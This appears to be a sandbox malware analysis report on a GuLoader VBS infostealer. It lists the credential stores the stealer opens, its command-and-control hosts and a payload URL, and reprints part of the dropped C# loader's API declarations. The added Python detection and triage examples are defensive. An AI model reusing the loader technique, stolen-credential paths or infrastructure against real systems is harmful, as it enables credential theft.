        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
        Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

        Remote Access Functionality

        Source: Yara match | File source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_00EF44F2 bind,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_00EF44CD bind,
        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | 211 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Exfiltration Over Alternative Protocol | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | 421 Scripting | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 115 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | 21 Command and Scripting Interpreter | Logon Script (Windows) | 11 Process Injection | 421 Scripting | Security Account Manager | 211 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | 1 PowerShell | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 231 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | 23 Application Layer Protocol | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
        External Remote ServicesScheduled TaskStartup ItemsStartup Items231
        Virtualization/Sandbox Evasion
        DCSync1
        Remote System Discovery
        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation
        Proc Filesystem1
        System Network Configuration Discovery
        Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
        Process Injection
        /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Behavior Graph ID: 755275 | Sample: Ordine n.47201 pdf.vbs | Start date: 28/11/2022 | Architecture: WINDOWS | Score: 100

Signatures on the sample node: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Yara detected GuLoader; 4 other signatures

Process tree (numbers in brackets are the created-registry-value / created-file counters the graph displays next to each process):

wscript.exe [1 1], started from the sample
  Signatures: VBScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); Obfuscated command line found; Very long command line found
  powershell.exe [20]
    Dropped: C:\Users\user\AppData\...\i3ontxzb.cmdline (Unicode)
    Signatures: Tries to detect Any.run
    CasPol.exe [15 12]
      Network: ftp.mcmprint.net 185.31.121.136, port 21 (source ports 49725, 49726), RAX-ASBG, Bulgaria; qwedft.gq 162.240.62.179, port 80 (source port 49722), UNIFIEDLAYER-AS-1US, United States; 2 other IPs or domains
      Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); May check the online IP address of the machine; 5 other signatures
    csc.exe [3]
      Dropped: C:\Users\user\AppData\Local\...\i3ontxzb.dll (PE32)
      cvtres.exe [1]
    conhost.exe
  cmd.exe [1]
    conhost.exe
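Three edges of this tree are the ones worth alerting on at the host: wscript.exe starting powershell.exe (directly or through cmd.exe), powershell.exe driving csc.exe to compile Add-Type source out of the user's Temp directory, and powershell.exe launching CasPol.exe, the .NET policy tool that ends up running the stealer and talking to the FTP server. The Python below is an added example of those three checks over Sysmon-style process-creation events; it is not part of the report. The events are constructed to mirror this tree (the csc.exe arguments are copied from the dropped .cmdline file; the sample's on-disk path and every PID except PowerShell's 5864 are made up), and the list of .NET framework binaries is limited to CasPol.exe because that is what this sample used.

```python
import re

def basename(image):
    return image.rsplit("\\", 1)[-1].lower()

def build_tree(events):
    """events: list of dicts with pid, ppid, image, cmdline (Sysmon EID 1 shape)."""
    return {e["pid"]: e for e in events}

def ancestors(tree, pid, depth):
    """Yield the image basenames of up to `depth` parents of pid."""
    for _ in range(depth):
        event = tree.get(pid)
        if event is None or event["ppid"] not in tree:
            return
        pid = event["ppid"]
        yield basename(tree[pid]["image"])

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "cmd.exe"}
# The .NET framework binary this sample ran its payload in. A production rule
# would list more framework tools; the report only shows CasPol.exe.
INJECTION_TARGETS = {"caspol.exe"}
SUSPICIOUS_DIRS = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)

def csc_output_path(cmdline):
    """Extract the /out: argument of a csc.exe command line (quoted or bare)."""
    m = re.search(r'/out:(?:"([^"]*)"|(\S+))', cmdline, re.I)
    return (m.group(1) or m.group(2)) if m else None

def detect(events):
    tree = build_tree(events)
    findings = []
    for e in events:
        name = basename(e["image"])
        # Rule 1: script host -> (cmd ->) shell; two levels up covers the via-cmd case.
        if name in SHELLS and SCRIPT_HOSTS & set(ancestors(tree, e["pid"], 2)):
            findings.append(("script_host_spawns_shell", e["pid"]))
        # Rule 2: the C# compiler writing its output under a temp directory,
        # which is what PowerShell Add-Type does and what an interactive build does not.
        if name == "csc.exe":
            out = csc_output_path(e["cmdline"])
            if out and SUSPICIOUS_DIRS.search(out):
                findings.append(("csc_compiles_from_temp", e["pid"]))
        # Rule 3: PowerShell launching a .NET framework tool to host the payload.
        if name in INJECTION_TARGETS and "powershell.exe" in set(ancestors(tree, e["pid"], 1)):
            findings.append(("powershell_spawns_caspol", e["pid"]))
    return sorted(findings)

CSC = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe"
# Arguments copied from the dropped i3ontxzb.cmdline file in this report.
CSC_ARGS = ('/t:library /utf8output /R:"System.dll" /R:"C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\'
            'System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" '
            '/R:"System.Core.dll" /out:"C:\\Users\\user\\AppData\\Local\\Temp\\i3ontxzb\\i3ontxzb.dll" '
            '/debug- /optimize+ /warnaserror /optimize+ "C:\\Users\\user\\AppData\\Local\\Temp\\i3ontxzb\\i3ontxzb.0.cs"')

# Constructed events: the report's process tree (PID 5864 for powershell.exe is
# from the report, the rest are invented) plus a benign interactive build.
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 2000, "ppid": 1000, "image": "C:\\Windows\\System32\\wscript.exe",
     "cmdline": 'wscript.exe "C:\\Users\\user\\Desktop\\Ordine n.47201 pdf.vbs"'},  # path assumed
    {"pid": 3000, "ppid": 2000, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 5864, "ppid": 2000, "image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe"},
    {"pid": 6000, "ppid": 5864, "image": CSC, "cmdline": '"' + CSC + '" ' + CSC_ARGS},
    {"pid": 7000, "ppid": 5864, "image": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CasPol.exe",
     "cmdline": "CasPol.exe"},
    {"pid": 8000, "ppid": 1000, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe"},
    {"pid": 8100, "ppid": 8000, "image": CSC,
     "cmdline": '"' + CSC + '" /t:library /out:"C:\\dev\\build\\app.dll" app.cs'},
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:28} pid={pid}")
```

The benign pair (PIDs 8000 and 8100) is there to show the false-positive boundary: PowerShell running csc.exe is normal on a developer workstation, and the rule keys on the /out: location, not on the parent alone.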

Source | Detection | Scanner | Label | Link
Ordine n.47201 pdf.vbs | 0% | ReversingLabs | |
Ordine n.47201 pdf.vbs | 0% | Virustotal | | Browse
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
api.ipify.org.herokudns.com | 0% | Virustotal | | Browse
ftp.mcmprint.net | 10% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
http://qwedft.gq/Akkant/bwqPIdZhEA125.psm | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org.herokudns.com | 52.20.78.240 | true | false | | unknown
qwedft.gq | 162.240.62.179 | true | false | | unknown
ftp.mcmprint.net | 185.31.121.136 | true | true | | unknown
api.ipify.org | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
http://qwedft.gq/Akkant/bwqPIdZhEA125.psm | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
162.240.62.179 | qwedft.gq | United States | 46606 | UNIFIEDLAYER-AS-1US | false
52.20.78.240 | api.ipify.org.herokudns.com | United States | 14618 | AMAZON-AESUS | false
185.31.121.136 | ftp.mcmprint.net | Bulgaria | 199364 | RAX-ASBG | true
              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:755275
              Start date and time:2022-11-28 14:49:15 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 11m 52s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:Ordine n.47201 pdf.vbs
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:20
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.spyw.expl.evad.winVBS@13/10@3/3
              EGA Information:
              • Successful, ratio: 50%
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .vbs
              • Override analysis time to 240s for JS files taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
              • TCP Packets have been reduced to 100
              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, login.live.com, ctldl.windowsupdate.com
              • Execution Graph export aborted for target powershell.exe, PID 5864 because it is empty
• Not all processes were analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
14:51:11 | API Interceptor | 26x Sleep call for process: powershell.exe modified
14:53:16 | API Interceptor | 510x Sleep call for process: CasPol.exe modified
No context
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:modified
              Size (bytes):8003
              Entropy (8bit):4.839308921501875
              Encrypted:false
              SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
              MD5:937C6E940577634844311E349BD4614D
              SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
              SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
              SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
              Malicious:false
              Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Mon Nov 28 22:51:21 2022, 1st section name ".debug$S"
              Category:modified
              Size (bytes):1332
              Entropy (8bit):3.993205850947984
              Encrypted:false
              SSDEEP:24:HIhzW9/YvcvzZHlYhKPfII+ycuZhNuwakS51PNnq92d:dnzZUKPg1uluwa35vq9G
              MD5:5216863F480F7882AFAEB89499228D62
              SHA1:2FB2EE5648BD1299BB19C290959389D28E949E64
              SHA-256:E72C9C28195AEE60FF6D5C4A7A7BAC75E2BCDE090DB1809D056A4593BE620267
              SHA-512:E10835EA13C09419A91B594414851DE24475C52351F2F332AB4F712E9E3888D141E90C28AEE3D86561AC8CDCA62732275DA225A3DCA92EAF739A5A63BD419AED
              Malicious:false
              Preview:L...i;.c.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........V....c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP..................3.vX\pf5.D.W%.4..........7.......C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp.-.<...................'...Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.3.o.n.t.x.z.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview:1
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview:1
              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.097050408210201
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryduwak7Ynqq2u1PN5Dlq5J:+RI+ycuZhNuwakS51PNnqX
              MD5:DA33A376585C706635F644DB5725B434
              SHA1:272B23AC808ED82681252C631879A4DCD6EEE31F
              SHA-256:2575D68B16ABBC5375AA45E18277CE15325F90F1169E3426B8DB3EBDD8723C4A
              SHA-512:9AB011BF6BF4CD87C7BDF2017DCE89F539DB31C9F8923B10607B21BE4F9FB6713904D49905D4E524B4A8A139838D6E5F81B8621EB886BB79FFAF9004A3B15780
              Malicious:false
              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.3.o.n.t.x.z.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.3.o.n.t.x.z.b...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1160), with no line terminators
              Category:dropped
              Size (bytes):1163
              Entropy (8bit):4.896337045995905
              Encrypted:false
              SSDEEP:24:JVSkaft8Qnl+BtwLzZTfgK9ZJqCNBFToLFxYBZ+dU6C5MnH:JVhafSQl+QRToK9ZJJNBFUBSZ+dUr5MH
              MD5:54C8D9DE5C308B3B41EFB88461C28598
              SHA1:555180A90D78546DF302FFB4C53F4E4290380D96
              SHA-256:E4E7463629553F5D62C18DD2FAB65BE93EBDF404C5663C189EE07FB6D4AC7C75
              SHA-512:206D0F4A95FB8D038DDD773E39F5D57AF3F603895A23E2E7D36DFC782DF8B9C4B9ED4508F4DF6CF28566967C902031E35807F28C512D7AB652355A3312E60DD1
              Malicious:false
              Preview:.using System;using System.Runtime.InteropServices;public static class Stueorglers1 {[DllImport("winspool.drv")]public static extern int PrinterMessageBox(int Stabl,int delagt,int Cro,int Rivul,int Tropic,int Skitse);[DllImport("ADVAPI32.DLL")]public static extern int RegQueryInfoKey(int Potten,int Teleol,int Plur,int Fusion,int sal,int Sau,int kalk,int Wee,int Godk,int Synan,int Pea,int Birk);[DllImport("kernel32")]public static extern int DuplicateHandle(int Hje,int Meetin,int Unor,int exac,int Over,int Biomec,int Silu);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImport("user32")]public static extern int GetProp(int Egy,int Sha);[DllImport("user32")]public static extern int CreateCursor(int Mell,int Rrl,int Flyg,int fastl,int Baan111,int Pseu,int Quaker);[DllImport("advapi32")]public static extern int SetServiceBits(int Gar,int Tenon,int Desp,int Explat);[DllImport("gdi32")]public static extern int GetClipRgn(int Rula,int Likv104);[
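The preview above is the C# that PowerShell's Add-Type handed to csc.exe: a static class whose only job is to expose Win32 entry points through P/Invoke, with VirtualAlloc and DuplicateHandle buried among decoys such as PrinterMessageBox and GetClipRgn, every parameter typed as int, and parameter names drawn from the same word salad as the VBS. Triage of such a dropped .cs file comes down to listing the imports and asking which of them a stager actually needs. The Python below is an added example of that, not part of the report; the embedded source is the declarations visible in the preview (the class is closed here because the preview is cut off after the last import), and the watch list of memory and injection APIs is this example's own, not something the report states.

```python
import re

# A DllImport declaration as Add-Type emits it: the attribute, then the extern signature.
DLLIMPORT = re.compile(
    r'\[DllImport\("(?P<dll>[^"]+)"\)\]\s*public\s+static\s+extern\s+(?P<ret>\w+)\s+'
    r'(?P<name>\w+)\s*\((?P<params>[^)]*)\)', re.S)

# APIs a shellcode stager typically needs; this is the example's own watch list.
INJECTION_APIS = {
    "VirtualAlloc", "VirtualAllocEx", "VirtualProtect", "WriteProcessMemory",
    "CreateRemoteThread", "CreateThread", "NtProtectVirtualMemory",
    "DuplicateHandle", "CallWindowProcW",
}

def parse_dllimports(source):
    """Return [(dll, function, [parameter types])] for every DllImport in the source."""
    decls = []
    for m in DLLIMPORT.finditer(source):
        params = [p.strip().split()[0] for p in m.group("params").split(",") if p.strip()]
        decls.append((m.group("dll").lower(), m.group("name"), params))
    return decls

def triage(source):
    decls = parse_dllimports(source)
    suspicious = [name for _dll, name, _params in decls if name in INJECTION_APIS]
    all_int = all(t == "int" for _dll, _name, params in decls for t in params)
    return {
        "declared": [name for _dll, name, _params in decls],
        "suspicious": suspicious,
        # Decoys: imports that pad the class so the useful ones do not stand out.
        "decoy_count": len(decls) - len(suspicious),
        # Pointers and handles all declared as 32-bit ints only work in a 32-bit
        # process, which fits the Framework (not Framework64) CasPol.exe used here.
        "all_int_params": all_int,
    }

# Declarations from the dropped i3ontxzb.0.cs preview; the closing brace is added
# because the report's preview is truncated after the last visible import.
SAMPLE_SOURCE = '''using System;using System.Runtime.InteropServices;public static class Stueorglers1 {[DllImport("winspool.drv")]public static extern int PrinterMessageBox(int Stabl,int delagt,int Cro,int Rivul,int Tropic,int Skitse);[DllImport("ADVAPI32.DLL")]public static extern int RegQueryInfoKey(int Potten,int Teleol,int Plur,int Fusion,int sal,int Sau,int kalk,int Wee,int Godk,int Synan,int Pea,int Birk);[DllImport("kernel32")]public static extern int DuplicateHandle(int Hje,int Meetin,int Unor,int exac,int Over,int Biomec,int Silu);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImport("user32")]public static extern int GetProp(int Egy,int Sha);[DllImport("user32")]public static extern int CreateCursor(int Mell,int Rrl,int Flyg,int fastl,int Baan111,int Pseu,int Quaker);[DllImport("advapi32")]public static extern int SetServiceBits(int Gar,int Tenon,int Desp,int Explat);[DllImport("gdi32")]public static extern int GetClipRgn(int Rula,int Likv104);}'''

if __name__ == "__main__":
    for dll, name, params in parse_dllimports(SAMPLE_SOURCE):
        print(f"{dll:14} {name:20} {len(params)} params")
    print(triage(SAMPLE_SOURCE))
```

Two of eight imports survive the filter, which is the signal: a legitimate Add-Type shim imports what it calls, while a loader imports one allocator and one handle primitive and hides them in noise. The same parser runs unchanged over the .cs files PowerShell leaves in %TEMP% on any host where Add-Type was used.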
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (374), with no line terminators
              Category:dropped
              Size (bytes):377
              Entropy (8bit):5.224013965503116
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fzEQUzxs7+AEszIcNwi23fzEQmA:p37Lvkmb6KwZYQUWZEJZYQR
              MD5:C0FA1452EA401B9C3DD58DFBF90FF905
              SHA1:E7176041207188F5EC74B233BFBAA95B62B5A62D
              SHA-256:BA134CBB89F5E901CADCFDBE2D741891736B9C52E09DB2751D7CB755C0141E91
              SHA-512:BA1CB0B87C7F5822AA3C760667924A6E44F6262F51D75AA350AA065FD0552B277AC37B1750742AD2E0FC7D4A7A9F32C5A8CFF693DD2254330D9A5D439FAB8591
              Malicious:true
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.0.cs"
              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):4096
              Entropy (8bit):3.2841703403897786
              Encrypted:false
              SSDEEP:48:6MkG51Mp2p9iSk+A6s9hvS3C6OFTre1uluwa35vq:KG51njiSk+N3MZwwK5
              MD5:472A0CEAFAC864C213CE8B1A44A72F2D
